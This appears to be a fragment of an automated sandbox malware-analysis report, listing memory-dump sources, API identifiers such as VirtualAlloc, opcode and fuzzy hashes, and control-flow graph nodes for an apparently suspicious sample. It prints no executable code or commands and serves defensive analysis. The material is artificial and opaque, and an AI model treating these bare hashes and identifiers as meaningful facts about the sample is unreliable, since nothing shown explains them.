                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B888000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B888000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b888000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: 93dad3fdb1a6eb9bbd31a771908be4c3b7cd87efec79cbb8f064238965695c8e
                                                                                                • Instruction ID: 5862c9bc8dacd59b8c5c83ee6e19f59338627397bb23dcd33de4c1f63bd78105
                                                                                                • Opcode Fuzzy Hash: 93dad3fdb1a6eb9bbd31a771908be4c3b7cd87efec79cbb8f064238965695c8e
                                                                                                • Instruction Fuzzy Hash: 6D413C3190DB8D4FDB1D9BA89C166E97FE0EF96321F0442AFD099C3193DA746406C792

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 47 7ffd9b88c181-7ffd9b88c18d 48 7ffd9b88c18f 47->48 49 7ffd9b88c191-7ffd9b88c1cd 47->49 48->49 50 7ffd9b88c1d1-7ffd9b88c242 VirtualAlloc 48->50 49->50 53 7ffd9b88c24a-7ffd9b88c272 50->53 54 7ffd9b88c244 50->54 54->53
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B888000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B888000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b888000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: fd007314ea28f01cab09209a5aba62497771038bf8341b4f2dc4d45734023e3d
                                                                                                • Instruction ID: ecbce58f7d08cdd5efa2aa90a69ff6190ba210e97996179a55401ba501b222c5
                                                                                                • Opcode Fuzzy Hash: fd007314ea28f01cab09209a5aba62497771038bf8341b4f2dc4d45734023e3d
                                                                                                • Instruction Fuzzy Hash: 0B31FB31A0CB4C8FDB1DAB6C98166F9BBF0EF56321F10426FD05AC3152DA7468168795

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 56 7ffd9b8a5619-7ffd9b8a564a 57 7ffd9b8a564e-7ffd9b8a5653 56->57
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: M
                                                                                                • API String ID: 0-3664761504
                                                                                                • Opcode ID: 6f2b87595dcc646dcdb325e2cc22d6c29e67dfa18fb1908c73558b51357ab1e3
                                                                                                • Instruction ID: b34511a45e21b288402e2a9d3dada772e9a56df924e6b87daad18560c65a8ce7
                                                                                                • Opcode Fuzzy Hash: 6f2b87595dcc646dcdb325e2cc22d6c29e67dfa18fb1908c73558b51357ab1e3
                                                                                                • Instruction Fuzzy Hash: 77E0923064E7C44FCB16AB3488684547F70EF6720174A42EEC05ACF1A7EB2DC98AC701

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 58 7ffd9b8a9449-7ffd9b8a9474 60 7ffd9b8a9478-7ffd9b8a947d 58->60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: I
                                                                                                • API String ID: 0-3707901625
                                                                                                • Opcode ID: e32b4aaf5d45e087c8742554feeaf95873a8ecd19e5df79767dbc94f747141de
                                                                                                • Instruction ID: 9f8d1d6699d3b4fcc569e11a253fb955fba038205e6ccc62ef4b7d96fb9170ce
                                                                                                • Opcode Fuzzy Hash: e32b4aaf5d45e087c8742554feeaf95873a8ecd19e5df79767dbc94f747141de
                                                                                                • Instruction Fuzzy Hash: DEE01A6194F3D44FCB5AAB7488699543FB0AF6B21078B41EEC186CF1B3E62D9849C712

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 61 7ffd9b8a95f9-7ffd9b8a9624 63 7ffd9b8a9628-7ffd9b8a962d 61->63
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: I
                                                                                                • API String ID: 0-3707901625
                                                                                                • Opcode ID: be175d6ff2bf495af3fbbdad21f173e96363bd5951b43badf5b745a9fe3ca608
                                                                                                • Instruction ID: ba953d79276908f8b1c5965e08471aa22acb52f2b9af41b076d4df89630ebb6b
                                                                                                • Opcode Fuzzy Hash: be175d6ff2bf495af3fbbdad21f173e96363bd5951b43badf5b745a9fe3ca608
                                                                                                • Instruction Fuzzy Hash: 49E0E57154F3D44FCB1AEBB988698453FA0AE6B21078B41EEC089CF1B3E62DD949C711

                                                                                                Control-flow Graph

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b468713bd7588aea15edb305b1472e14605b7c537d832ad01db9bd14e9875df5
                                                                                                • Instruction ID: 47b93642c4cf0e09572b0ec449788595b4e9aa9c2ec5de849ddd48f73e998c85
                                                                                                • Opcode Fuzzy Hash: b468713bd7588aea15edb305b1472e14605b7c537d832ad01db9bd14e9875df5
                                                                                                • Instruction Fuzzy Hash: 9AA1B330B1890D8FDB58EF68C4A8AA977E2FF98300B550679D01EC72D6DF38A842C751

                                                                                                Control-flow Graph

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 03bc7a3b354f006fc76a7cfa48e593f40e897ce92b922b7269f47fa46b5d116c
                                                                                                • Instruction ID: 69fbdc4331560eb8268ae760d45dfd0a56e42813b836fefd3c61d2a406c2b95e
                                                                                                • Opcode Fuzzy Hash: 03bc7a3b354f006fc76a7cfa48e593f40e897ce92b922b7269f47fa46b5d116c
                                                                                                • Instruction Fuzzy Hash: 6031FA30A0DA4A8FDB56EB74C8649A97BF1FF5E310B0905FAC059C71A2DE385545C740
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d32431d7d61f74789dfae13fa70862435f5bac2241f648caa007a2a78cf94a2d
                                                                                                • Instruction ID: 55a89c2853c2ec3d53b50e70509c4a93600150b4fa32b02a41995c99840a0d1a
                                                                                                • Opcode Fuzzy Hash: d32431d7d61f74789dfae13fa70862435f5bac2241f648caa007a2a78cf94a2d
                                                                                                • Instruction Fuzzy Hash: F3214135F1DA5D8FE722ABB898250DC7B60DF85724F0545F3C058CB1D3D9382A869751
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ac4067171acecf667c29ea7aaec5c57bed888b1b169faf0d90d5f4c79a40041e
                                                                                                • Instruction ID: 5b450efa381afaf6c60209670a25b328e60e3041148e95add525b39bd3418b08
                                                                                                • Opcode Fuzzy Hash: ac4067171acecf667c29ea7aaec5c57bed888b1b169faf0d90d5f4c79a40041e
                                                                                                • Instruction Fuzzy Hash: 1F310C31E1895D8FEB64EB54C8A4BA972A1FB5C324F1501BDD42ED32E1CA396E81CB41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c755e17f7d9966cc3d01fd151e628425b1f0bf07c79701fd9e96edc305e1c2c8
                                                                                                • Instruction ID: dfd89235822056c8b69d429db7ad6e2f1b440916286932d9c79c208a29ba7e54
                                                                                                • Opcode Fuzzy Hash: c755e17f7d9966cc3d01fd151e628425b1f0bf07c79701fd9e96edc305e1c2c8
                                                                                                • Instruction Fuzzy Hash: 42110C20B1AD0E8FEBA4EF9488A57B86291EF5C301F5500B9C41ED72B2DE38AA448710
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b0d4b3ce926893a87e318e1d1af0a2c35c0ebf35d28aef39388c493214434887
                                                                                                • Instruction ID: 26db16c5fa50d79b017cae106418b5f22e7ef867c3ad606ca9b1458e48d68e03
                                                                                                • Opcode Fuzzy Hash: b0d4b3ce926893a87e318e1d1af0a2c35c0ebf35d28aef39388c493214434887
                                                                                                • Instruction Fuzzy Hash: 6711A535F1EA8D8FE722DFA4886109C7FB1EF56714F0645F7C054DB2A2D9386A458780
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c13e825169c82e0260183b0dfc059ff39dc103e1a37d20102da221b4f3c6b246
                                                                                                • Instruction ID: d7254e299d0c61633fd50ebeeaaf2b73b15b763aa472bfd5dc29bfbfdbf89828
                                                                                                • Opcode Fuzzy Hash: c13e825169c82e0260183b0dfc059ff39dc103e1a37d20102da221b4f3c6b246
                                                                                                • Instruction Fuzzy Hash: 88011E21B1ED0D8BEB64EF9884A967823D2DF98710F1601B9D41AC72B2DD29AA418640
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b890000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8a8d3b4fd29dd231a59ab23c32f68f7f023d90f41b574e22d7000da38cb76b49
                                                                                                • Instruction ID: 53628ea54a5a0456ebef643ac179e7f374f28925f1c1c01116258b0154ed8f5d
                                                                                                • Opcode Fuzzy Hash: 8a8d3b4fd29dd231a59ab23c32f68f7f023d90f41b574e22d7000da38cb76b49
                                                                                                • Instruction Fuzzy Hash: 21F0A931B0E6894BE771975884646B93B52AB99310F0E03BBC489CB1E3DD6CD6454381
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 597a111aaa3ff7193ac4c8d1aa9993a163465701550ac9b6362354db1bca4f5e
                                                                                                • Instruction ID: 37f4339d33d39cd644b4e054429b46a73f4236abb15be0902c5367a7f2ccc744
                                                                                                • Opcode Fuzzy Hash: 597a111aaa3ff7193ac4c8d1aa9993a163465701550ac9b6362354db1bca4f5e
                                                                                                • Instruction Fuzzy Hash: 16018031E1EA8D8FE726DFA4886009C7FB1EF56714F1641F7C054DB2A2D9386A458780
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b890000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f816e9fdf322565091b56c120fde06d9b49a4cc4fa58d20ab5f0daee4d58842d
                                                                                                • Instruction ID: bef2b07e75fe74a3ada801682d41d814f5ea77a6482d6349d68a978e57ce8e6e
                                                                                                • Opcode Fuzzy Hash: f816e9fdf322565091b56c120fde06d9b49a4cc4fa58d20ab5f0daee4d58842d
                                                                                                • Instruction Fuzzy Hash: E1F04F71E0551E8BFB68EB44C8686BD7BF1FF58310F040A3AC415D32A4DF786A428B80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction ID: 8629ccb71356551793cb72b9435150d64bf50a69d22b91340b35a22e1fcecbb4
                                                                                                • Opcode Fuzzy Hash: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction Fuzzy Hash: 9EF0F434A1AD0E8BEBA4FFC0C8A46B87361EF58311F510179C41AD72B1CE386A85C700
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b890000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f2bb60bd4aab3c2f2d65c5010c5c93abf419b99a4010c605e80952fb68c6db48
                                                                                                • Instruction ID: 793c16305598de0da2036bd3913b430ef0dee1226a1446d76d8f3a44a313ab82
                                                                                                • Opcode Fuzzy Hash: f2bb60bd4aab3c2f2d65c5010c5c93abf419b99a4010c605e80952fb68c6db48
                                                                                                • Instruction Fuzzy Hash: 8AF05430B0D91F8BFE359B98E4505B93390FF59711F164179D85AC31E7DE28EA428680
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d42dea046c5fc3cd9f5167775ac7a0eb666f0a10076f182ca0fe3da02a91fd51
                                                                                                • Instruction ID: 3e0a9effb5b4379b3dea4615c122526dd3d7830f0d2d2b3d5d97d14099ed72c8
                                                                                                • Opcode Fuzzy Hash: d42dea046c5fc3cd9f5167775ac7a0eb666f0a10076f182ca0fe3da02a91fd51
                                                                                                • Instruction Fuzzy Hash: 58F01C6155F7D41FD3229B388C254557FA0EB1710574A46EBC0C9CB5B3EA0A988B8312
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5cf0ac7e0c0f75ade8b57afa115da3b73235f2550fe306a08f9d25b6232a2584
                                                                                                • Instruction ID: 7a99098e59ef17b41aa4d92dee92fc66d2adb8f18f719d2ee45478b29fcf8eec
                                                                                                • Opcode Fuzzy Hash: 5cf0ac7e0c0f75ade8b57afa115da3b73235f2550fe306a08f9d25b6232a2584
                                                                                                • Instruction Fuzzy Hash: 7FF03A61F2AD2E4BF7B0F79484A57B82291AF1C710F1A0171D46DE22E1CE3CAE814A42
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction ID: 938b93f7eb412964e14054d9f2b4f6d1dd7efd82c935e5241432befb80103025
                                                                                                • Opcode Fuzzy Hash: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction Fuzzy Hash: 9DF0D020B1AD0D8BEBB0EF84C9A47B93352EF58311F1141B9C91AD72B2DD396E458650
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4b1cce890a7b8bbed82eb325ff52508912438608fa753e00a98f9c75927c150e
                                                                                                • Instruction ID: 4a3df3ffd12e38fb49a7e82e67918ad3a5546d5f45b016834e4934e6deb8be31
                                                                                                • Opcode Fuzzy Hash: 4b1cce890a7b8bbed82eb325ff52508912438608fa753e00a98f9c75927c150e
                                                                                                • Instruction Fuzzy Hash: 16F0B430B19A0ACBE758DFA4C8A46B977E1EB58711F1446BAD019C32E5DD386684CB40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e440ec6f8ea3bf72a6a830cc167af539fb6aec95a4f611f324308661fa03d057
                                                                                                • Instruction ID: bdddf4109cd4ce0621d51b450a199109d5b3efc793ff55a958a3d1694d8f7901
                                                                                                • Opcode Fuzzy Hash: e440ec6f8ea3bf72a6a830cc167af539fb6aec95a4f611f324308661fa03d057
                                                                                                • Instruction Fuzzy Hash: FFE09A2011EBC44FCB02EB388C294147FE1EB4B200B8E81FBD088CB1B3CA5988898302
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 23af8b02c83673e697804d6912b726cbfc3ac525e99587d5a450d14d2ff9be44
                                                                                                • Instruction ID: b78ef2243c147c3e8238b345662f9333ec1ed41f0041ed020e7f70da1993ea68
                                                                                                • Opcode Fuzzy Hash: 23af8b02c83673e697804d6912b726cbfc3ac525e99587d5a450d14d2ff9be44
                                                                                                • Instruction Fuzzy Hash: 6FE0ED61F2AC5E4BE7B4FB5884A6BB82292AB5C740B160175D42ED22E2DD386D814741
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ad5de0c6f0be1361825a16bf00fcf2b0ccf3fbe2b39e0edb8f03cc6ba9f90fc4
                                                                                                • Instruction ID: 2843981a3e9a9e6076dec504db07e9141593aa03f3f046dcc4f74931e887019a
                                                                                                • Opcode Fuzzy Hash: ad5de0c6f0be1361825a16bf00fcf2b0ccf3fbe2b39e0edb8f03cc6ba9f90fc4
                                                                                                • Instruction Fuzzy Hash: CBE04F71E29C2A0BE7B0F75884AA6B437D1EB5C341F554272D92DD32E1DE386D824B82
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f5ad3ed1db2a4fb20346d4fabfef610315c87c828e82cc93aeb04719ac574b59
                                                                                                • Instruction ID: 3af2870c22bc24fd68d5cde8808151eed352b9d01b11792f2ca58901f3f60972
                                                                                                • Opcode Fuzzy Hash: f5ad3ed1db2a4fb20346d4fabfef610315c87c828e82cc93aeb04719ac574b59
                                                                                                • Instruction Fuzzy Hash: 00C0EA20F2AD1E9BEAA8B3A484662B951C65F4C700B560574D1AED32E2DD2D6A408A40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b880000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 75243df594dad3189b481bc2cafaadaf262bb75a415f265b74f5873103093f93
                                                                                                • Instruction ID: cac6f641e0f836e38aa70b5b9b9236bc1d6fb6d2235cd4a525db49e56f9d5373
                                                                                                • Opcode Fuzzy Hash: 75243df594dad3189b481bc2cafaadaf262bb75a415f265b74f5873103093f93
                                                                                                • Instruction Fuzzy Hash: 00C04C19F19C2A47F3697214483167D04929B48754F950074E46D976DECD5C5A0212C7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000030.00000002.2263623075.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_48_2_7ffd9b8a1000_VTixufCejPQZEvXiB.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 22c0f85be38833c9e9902a2a0e4f14f72f945995ede4d930356bf2512360dc9d
                                                                                                • Instruction ID: e425a0db9fe55fa0ec8003d36a69f58f0e46986591355cacf7f74b1150c8a269
                                                                                                • Opcode Fuzzy Hash: 22c0f85be38833c9e9902a2a0e4f14f72f945995ede4d930356bf2512360dc9d
                                                                                                • Instruction Fuzzy Hash: C5A00205D97C0E02D81832FA2E9709474545F8E115FC62AA0EC188059AEA9E26E94393
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5X_H
                                                                                                • API String ID: 0-3241812158
                                                                                                • Opcode ID: 5772d9d23eed927ef1e5aada0b39a8a7798b155f0e66ec6aed5b18fdb32771f7
                                                                                                • Instruction ID: 7acab593d342c0346c400c0048ca2c5070366e2685689c22874cc1a5024dcfb0
                                                                                                • Opcode Fuzzy Hash: 5772d9d23eed927ef1e5aada0b39a8a7798b155f0e66ec6aed5b18fdb32771f7
                                                                                                • Instruction Fuzzy Hash: 8691DF71A19A9E8FE799DF6C88657FD7BF1EB59300F4001BED019CB2E2DA7518018781
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3e884727b10ddc15a2cb45d2db503d53a914a1ac726d7b1fb6bd2e9eb87e4a4e
                                                                                                • Instruction ID: c179e37cc03e7c4a5e076513fc4d4132796f8f95cfd2389d5995a490592623cc
                                                                                                • Opcode Fuzzy Hash: 3e884727b10ddc15a2cb45d2db503d53a914a1ac726d7b1fb6bd2e9eb87e4a4e
                                                                                                • Instruction Fuzzy Hash: 7651DE71A29A5E8AE398CF6C8865BFD7BF1EB99310F4001BED019C73D6DAB514118740
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4c6c55c73d8cfc5d9a3d5589c873d0749c87b872294c34acf1ac3a8507f85722
                                                                                                • Instruction ID: c543bcd572307d75bea4f1371e65b937b2228b205a4f428d3b57d14a55fab603
                                                                                                • Opcode Fuzzy Hash: 4c6c55c73d8cfc5d9a3d5589c873d0749c87b872294c34acf1ac3a8507f85722
                                                                                                • Instruction Fuzzy Hash: DE411721B1D6691EE30AB7BC74BA5F97B90DF49325B0804FBD44AC71FBDD18684282C5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7ae844f7a6823ece56adf43a4e3d1d0ea095862588d1daea813473c40cbbb6d2
